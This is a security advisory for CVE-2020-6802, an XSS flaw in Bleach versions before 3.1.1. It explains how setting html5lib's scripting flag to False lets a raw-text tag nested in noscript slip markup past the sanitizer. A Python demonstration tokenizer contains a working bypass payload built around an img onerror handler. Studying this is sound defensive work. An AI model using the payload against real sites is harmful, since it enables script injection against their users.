CVE-2020-6802: XSS in Bleach when noscript and raw tag whitelisted
CVSS Score: 6.1 (CVSS v3.1)
Basic Information
CVE ID: CVE-2020-6802
GHSA ID:
EPSS Score: 0.72178%
CWE:
Published: 2/24/2020
Updated: 9/13/2024
KEV Status: No
Technology: Python
Technical Details
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
---|---|---|---|
bleach | pip | < 3.1.1 | 3.1.1 |
Vulnerability Intelligence
Miggo AI
Root Cause Analysis
The vulnerability stems from Bleach's HTML parser handling <noscript> differently than browsers do. The commit diff shows the critical fix was changing scripting=False to scripting=True in BleachHTMLParser._parse to align with browser behavior. In html5lib this flag selects how the contents of <noscript> are tokenized: with scripting=False they are parsed as ordinary HTML, while with scripting=True they are treated as raw text up to the closing </noscript>, which is what a browser with JavaScript enabled does.
The vulnerable version's False setting created a parsing mismatch: an attacker nests a raw-text tag such as <style> inside <noscript>, so Bleach sees a <noscript> holding a harmless <style> body, while the browser sees the <noscript> close at the first </noscript> and then parses whatever follows (for example an <img> with an onerror handler) as live markup. The bypass only applies when noscript and at least one raw-text tag are both in the allowed-tags list; neither is in Bleach's default allowed tags, so callers that extended the allow list are the ones affected.
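To make the mismatch concrete, the following is an added example (not Bleach's or html5lib's own code): a deliberately simplified tokenizer that models only the part of the html5lib `scripting` flag that matters here, namely whether <noscript> is a raw-text element. The raw-text tag set, the payload, and the `allows_noscript_bypass` configuration check are constructed for this demonstration; the real parsers have many more rules.

```python
import re

# Elements whose content browsers tokenize as raw text rather than as HTML.
# Assumed set for this demo; Bleach keeps its own list in its source.
RAW_TEXT_TAGS = {"script", "style", "xmp", "iframe", "noembed", "noframes"}

_TAG_RE = re.compile(r"<(/?)([a-zA-Z][a-zA-Z0-9]*)[^>]*>")


def tokenize(html, scripting):
    """Return the start tags a simplified HTML tokenizer recognises.

    Models the html5lib ``scripting`` flag: once a raw-text element opens,
    everything up to its matching end tag is swallowed as text, so no tags
    are recognised inside it. With scripting=True, <noscript> is raw text
    as well (a browser with JavaScript on); with scripting=False its content
    is parsed as ordinary HTML (what Bleach < 3.1.1 did).
    """
    raw = set(RAW_TEXT_TAGS)
    if scripting:
        raw.add("noscript")
    tags = []
    pos = 0
    while True:
        m = _TAG_RE.search(html, pos)
        if m is None:
            break
        closing, name = m.group(1), m.group(2).lower()
        pos = m.end()
        if closing:
            continue
        tags.append(name)
        if name in raw:
            # Swallow everything up to the matching end tag as plain text.
            end = re.search(r"</%s\s*>" % name, html[pos:], re.IGNORECASE)
            pos = pos + end.end() if end else len(html)
    return tags


def tags_hidden_from_sanitizer(html):
    """Tags a browser (scripting=True) sees that a scripting=False parse misses.

    A non-empty result means the sanitizer's view of the document is missing
    elements the browser will actually instantiate.
    """
    return set(tokenize(html, scripting=True)) - set(tokenize(html, scripting=False))


def allows_noscript_bypass(allowed_tags):
    """Hypothetical config check: the bypass needs noscript plus a raw-text tag allowed."""
    allowed = {t.lower() for t in allowed_tags}
    return "noscript" in allowed and bool(allowed & RAW_TEXT_TAGS)


# Constructed payload. A scripting=False parse sees <noscript> containing a
# <style> element whose raw text is "</noscript><img ...>", which looks inert.
# A scripting=True parse (the browser) reads raw text only until </noscript>,
# then parses the <img> as a real element whose onerror handler runs.
PAYLOAD = "<noscript><style></noscript><img src=x onerror=alert(1)>"

if __name__ == "__main__":
    print("sanitizer view (scripting=False):", tokenize(PAYLOAD, scripting=False))
    print("browser view   (scripting=True): ", tokenize(PAYLOAD, scripting=True))
    print("hidden from sanitizer:", tags_hidden_from_sanitizer(PAYLOAD))
    print("default-ish allow list exposed?", allows_noscript_bypass(["a", "b", "i", "em"]))
    print("extended allow list exposed?", allows_noscript_bypass(["a", "noscript", "style"]))
```

The benign case is instructive too: for `<noscript><b>x</b></noscript>` the scripting=True parse sees fewer tags than the scripting=False parse, never more, so `tags_hidden_from_sanitizer` is empty. The danger is specifically the direction where the sanitizer sees fewer elements than the browser, which is what the raw-text-inside-noscript nesting produces.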